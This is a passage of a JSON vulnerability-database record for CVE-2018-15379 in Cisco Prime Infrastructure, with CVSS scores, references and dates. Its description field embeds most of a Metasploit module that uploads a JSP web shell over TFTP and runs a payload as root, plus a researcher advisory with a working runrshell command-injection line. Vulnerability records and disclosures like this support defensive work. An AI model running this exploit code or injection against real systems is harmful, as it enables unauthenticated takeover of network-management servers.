                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(1.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.3\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Pedro Ribeiro",
    "sources": [
      {
        "db": "BID",
        "id": "105506"
      },
      {
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "db": "PACKETSTORM",
        "id": "149727"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2018-15379",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2018-15379",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-125632",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-15379",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-15379",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201810-179",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-125632",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco Prime Infrastructure is prone to an arbitrary file-upload vulnerability. \nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution with root privileges within the context of the vulnerable application. \nThis issue is being tracked by Cisco Bug ID CSCvk24890. \n\n        This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions\n        might also be affected, although 3.4.0.0.348 is the latest at the time of writing. \n      },\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Pedro Ribeiro \u003cpedrib[at]gmail.com\u003e\u0027        # Vulnerability discovery and Metasploit module\n        ],\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027References\u0027     =\u003e\n        [\n          [ \u0027CVE\u0027, \u00272018-15379\u0027 ],\n          [ \u0027URL\u0027, \u0027https://seclists.org/fulldisclosure/2018/Oct/19\u0027],\n          [ \u0027URL\u0027, \u0027https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt\u0027 ],\n          [ \u0027URL\u0027, \u0027https://blogs.securiteam.com/index.php/archives/3723\u0027 ],\n          [ \u0027URL\u0027, \u0027https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp\u0027 ]\n        ],\n      \u0027Platform\u0027       =\u003e \u0027linux\u0027,\n      \u0027Arch\u0027           =\u003e [ARCH_X86, ARCH_X64],\n      \u0027Targets\u0027        =\u003e\n        [\n          [ \u0027Cisco Prime Infrastructure \u003c 3.4.1 \u0026 3.3.1 Update 02\u0027, {} ]\n        ],\n      \u0027Privileged\u0027     =\u003e true,\n      \u0027DefaultOptions\u0027 =\u003e { \u0027WfsDelay\u0027 =\u003e 10 },\n      \u0027DefaultTarget\u0027  =\u003e 0,\n      \u0027DisclosureDate\u0027 =\u003e \u0027Oct 04 2018\u0027\n    ))\n\n    register_options(\n      [\n        OptPort.new(\u0027RPORT\u0027, [true, \u0027The target port\u0027, 443]),\n        OptPort.new(\u0027RPORT_TFTP\u0027, [true, \u0027TFTPD port\u0027, 69]),\n        OptBool.new(\u0027SSL\u0027, [true, \u0027Use SSL connection\u0027, true]),\n        OptString.new(\u0027TARGETURI\u0027, [ true,  \"swimtemp path\", \u0027/swimtemp\u0027])\n      ])\n  end\n\n\n  def check\n    res = send_request_cgi({\n      \u0027uri\u0027    =\u003e normalize_uri(datastore[\u0027TARGETURI\u0027], \u0027swimtemp\u0027),\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    })\n\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return CheckCode::Unknown\n    end\n\n    if res.code == 404 \u0026\u0026 res.body.length == 0\n      # at the moment this is the best way to detect\n      # a 404 in swimtemp only returns the error code with a body length of 0,\n      # while a 404 to another webapp or to the root returns code plus a body with content\n      return CheckCode::Detected\n    end\n\n    CheckCode::Safe\n  end\n\n\n  def upload_payload(payload)\n    lport = datastore[\u0027LPORT\u0027] || (1025 + rand(0xffff-1025))\n    lhost = datastore[\u0027LHOST\u0027] || \"0.0.0.0\"\n    remote_file = rand_text_alpha(5..16) + \u0027.jsp\u0027\n\n    tftp_client = Rex::Proto::TFTP::Client.new(\n      \"LocalHost\"  =\u003e lhost,\n      \"LocalPort\"  =\u003e lport,\n      \"PeerHost\"   =\u003e rhost,\n      \"PeerPort\"   =\u003e datastore[\u0027RPORT_TFTP\u0027],\n      \"LocalFile\"  =\u003e \"DATA:#{payload}\",\n      \"RemoteFile\" =\u003e remote_file,\n      \"Mode\"       =\u003e \u0027octet\u0027,\n      \"Context\"    =\u003e {\u0027Msf\u0027 =\u003e self.framework, \u0027MsfExploit\u0027 =\u003e self},\n      \"Action\"     =\u003e :upload\n    )\n    print_status \"Uploading TFTP payload to #{rhost}:#{datastore[\u0027TFTP_PORT\u0027]} as \u0027#{remote_file}\u0027\"\n    tftp_client.send_write_request\n\n    remote_file\n  end\n\n  def generate_jsp_payload\n    exe = generate_payload_exe\n    base64_exe = Rex::Text.encode_base64(exe)\n\n    native_payload_name = rand_text_alpha(3..9)\n\n    var_raw     = rand_text_alpha(3..11)\n    var_ostream = rand_text_alpha(3..11)\n    var_pstream = rand_text_alpha(3..11)\n    var_buf     = rand_text_alpha(3..11)\n    var_decoder = rand_text_alpha(3..11)\n    var_tmp     = rand_text_alpha(3..11)\n    var_path    = rand_text_alpha(3..11)\n    var_tmp2    = rand_text_alpha(3..11)\n    var_path2   = rand_text_alpha(3..11)\n    var_proc2   = rand_text_alpha(3..11)\n\n    var_proc1 = rand_text_alpha(3..11)\n    chmod = %Q|\n    Process #{var_proc1} = Runtime.getRuntime().exec(\"chmod 777 \" + #{var_path} + \" \" + #{var_path2});\n    Thread.sleep(200);\n    |\n\n    var_proc3 = Rex::Text.rand_text_alpha(3..11)\n    cleanup = %Q|\n    Thread.sleep(200);\n    Process #{var_proc3} = Runtime.getRuntime().exec(\"rm \" + #{var_path} + \" \" + #{var_path2});\n    |\n\n    jsp = %Q|\n    \u003c%@page import=\"java.io.*\"%\u003e\n    \u003c%@page import=\"sun.misc.BASE64Decoder\"%\u003e\n    \u003c%\n    try {\n      String #{var_buf} = \"#{base64_exe}\";\n      BASE64Decoder #{var_decoder} = new BASE64Decoder();\n      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());\n\n      File #{var_tmp} = File.createTempFile(\"#{native_payload_name}\", \".bin\");\n      String #{var_path} = #{var_tmp}.getAbsolutePath();\n\n      BufferedOutputStream #{var_ostream} =\n        new BufferedOutputStream(new FileOutputStream(#{var_path}));\n      #{var_ostream}.write(#{var_raw});\n      #{var_ostream}.close();\n\n      File #{var_tmp2} = File.createTempFile(\"#{native_payload_name}\", \".sh\");\n      String #{var_path2} = #{var_tmp2}.getAbsolutePath();\n\n      PrintWriter #{var_pstream} =\n        new PrintWriter(new FileOutputStream(#{var_path2}));\n      #{var_pstream}.println(\"!#/bin/sh\");\n      #{var_pstream}.println(\"/opt/CSCOlumos/bin/runrshell \u0027\\\\\" \u0026\u0026 \" + #{var_path} + \" #\u0027\");\n      #{var_pstream}.close();\n      #{chmod}\n\n      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});\n      #{cleanup}\n    } catch (Exception e) {\n    }\n    %\u003e\n    |\n\n    jsp = jsp.gsub(/\\n/, \u0027\u0027)\n    jsp = jsp.gsub(/\\t/, \u0027\u0027)\n    jsp = jsp.gsub(/\\x0d\\x0a/, \"\")\n    jsp = jsp.gsub(/\\x0a/, \"\")\n\n    return jsp\n  end\n\n\n  def exploit\n    jsp_payload = generate_jsp_payload\n\n    jsp_name = upload_payload(jsp_payload)\n\n    # we land in /opt/CSCOlumos, so we don\u0027t know the apache directory\n    # as it changes between versions... so leave this commented for now\n    # ... and try to find a good way to clean it later\n    print_warning \"#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos\"\n    # register_files_for_cleanup(jsp_name)\n\n    print_status(\"#{peer} - Executing payload...\")\n    send_request_cgi({\n      \u0027uri\u0027    =\u003e normalize_uri(datastore[\u0027TARGETURI\u0027], jsp_name),\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    })\n\n    handler\n  end\nend\n. \u003e\u003e Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)\n==========================================================================\nDisclosure: 4/10/2018 / Last updated: 8/10/2018\n\n\n\u003e\u003e Introduction:\nFrom the vendor\u0027s website ([1]):\n\"Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users a all from one place. \nCisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. \nCisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. \nCisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructureaready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. \nDevice Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. \nLarge or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control.\"\n\n\n\u003e\u003e Background and summary:\nCisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution. \n\nA Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit\u0027s repository in the coming weeks. \n\nA special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2]. \n\n\n\u003e\u003e Technical details:\n#1\nVulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat\nCVE-2018-15379\nAttack Vector: Remote\nConstraints: None\nAffected products / versions:\n- Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected\n\nMost web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-\u003cVERSION\u003e/webapps. One of these applications is \"swimtemp\", which symlinks to /localdisk/tftp:\n\nade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/\ntotal 16\ndrwxrwxr-x.  3 root gadmin 4096 Mar 29 19:49 ROOT\ndrwxrwxr-x.  8 root gadmin 4096 Mar 29 21:44 SSO\nlrwxrwxrwx.  1 root gadmin   36 Mar 29 21:32 SSO.war -\u003e /opt/CSCOlumos/wars/SSO-13.0.201.war\ndrwxrwxr-x.  4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest\nlrwxrwxrwx.  1 root gadmin   45 Mar 29 21:32 ifm_poap_rest.war -\u003e /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war\nlrwxrwxrwx.  1 root gadmin   16 Mar 29 19:49 swimtemp -\u003e /localdisk/tftp/\ndrwxrwxr-x. 22 root gadmin 4096 May  2 15:20 webacs\nlrwxrwxrwx.  1 root gadmin   30 Mar 29 21:32 webacs.war -\u003e /opt/CSCOlumos/wars/webacs.war\n\nAs the name implies, this is the directory used by tftp to store files. Cisco has also enabled the upload of files to this directory as tftpd is started with the -c (file create) flag, and it accepts anonymous connections:\n/usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp\n\nThe tftpd port is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory. \n\nThe web shell will then be available at https://\u003cIP\u003e/swimtemp/\u003cSHELL\u003e, and it will execute as the \"prime\" user, which is an unprivileged user that runs the Apache Tomcat server. \n\n\n#2\nVulnerability: runrshell Command Injection\n(no specific CVE was attributed to this vulnerability by Cisco; use CVE-2018-15379, same as vulnerability #1)\nAttack Vector: Local\nConstraints: None\nAffected products / versions:\n- Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected\n\nThe CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below:\n\nint main(int argc, char* argv, char* envp)\n{\n  char dest;\n  int i;\n\n  setuid(0);\n  setgid(0);\n  setenv(\"PATH\", \"/opt/CSCOlumos/rcmds\", 1);\n  memcpy(\u0026dest, \"/bin/bash -r -c \\\"\", 0x12uLL);\n  for ( i = 1; argc - 1 \u003e= i; ++i )\n  {\n    strcat(\u0026dest, argv[i]);\n    strcat(\u0026dest, \" \");\n  }\n  strcat(\u0026dest, \"\\\"\");\n  return (system(\u0026dest) \u0026 0xFF00) \u003e\u003e 8;\n}\n\nAs it can be seen above, the binary uses the system() function to execute:\n/bin/bash -r -c \"\u003cCMD\u003e\"\n\n... with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc. \n\nHowever, due to the way system() function calls \"bash -c\", it is trivial to inject a command by forcing an end quote after \u003cCMD\u003e and the bash operator \u0027\u0026\u0026\u0027:\n[prime@prime34 ~]$ /opt/CSCOlumos/bin/runrshell \u0027\" \u0026\u0026 /usr/bin/whoami #\u0027                                  \nroot\n\n\n\u003e\u003e Fix: \nVulnerability #1 has ben fixed fixed with the patch provided by Cisco in [4]. \nVulnerability #2 does not appear to have been fixed as of the last update of this advisory. \n\nPlease note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor\u0027s responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. \n\n\n\u003e\u003e References:\n[1] https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html\n[2] https://blogs.securiteam.com/index.php/archives/3723\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_prime_inf_rce.rb\n[4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "BID",
        "id": "105506"
      },
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "db": "PACKETSTORM",
        "id": "149727"
      }
    ],
    "trust": 2.25
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-125632",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-15379",
        "trust": 3.1
      },
      {
        "db": "BID",
        "id": "105506",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1041816",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45555",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "149714",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "149727",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "150287",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-97589",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-125632",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "db": "BID",
        "id": "105506"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "db": "PACKETSTORM",
        "id": "149727"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "id": "VAR-201810-0571",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:33:41.600000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "cisco-sa-20181003-pi-tftp",
        "trust": 0.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181003-pi-tftp"
      },
      {
        "title": "Cisco Prime Infrastructure Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=85393"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-732",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-275",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181003-pi-tftp"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/105506"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/45555/"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1041816"
      },
      {
        "trust": 1.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15379"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15379"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/"
      },
      {
        "trust": 0.2,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.2,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://blogs.securiteam.com/index.php/archives/3723\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://raw.githubusercontent.com/pedrib/poc/master/advisories/cisco-prime-infrastructure.txt\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://seclists.org/fulldisclosure/2018/oct/19\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181003-pi-tftp\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://\u003cip\u003e/swimtemp/\u003cshell\u003e,"
      },
      {
        "trust": 0.1,
        "url": "https://raw.githubusercontent.com/pedrib/poc/master/exploits/metasploit/cisco_prime_inf_rce.rb"
      },
      {
        "trust": 0.1,
        "url": "https://blogs.securiteam.com/index.php/archives/3723"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/)"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "db": "BID",
        "id": "105506"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "db": "PACKETSTORM",
        "id": "149727"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "db": "BID",
        "id": "105506"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "db": "PACKETSTORM",
        "id": "149727"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "date": "2018-10-03T00:00:00",
        "db": "BID",
        "id": "105506"
      },
      {
        "date": "2019-02-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "date": "2018-11-13T03:15:00",
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
        "date": "2018-10-08T16:15:09",
        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "date": "2018-10-09T19:22:22",
        "db": "PACKETSTORM",
        "id": "149727"
      },
      {
        "date": "2018-10-05T14:29:07.013000",
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "date": "2018-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-125632"
      },
      {
        "date": "2018-10-03T00:00:00",
        "db": "BID",
        "id": "105506"
      },
      {
        "date": "2019-02-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "date": "2019-10-09T23:35:29.313000",
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "150287"
      },
      {
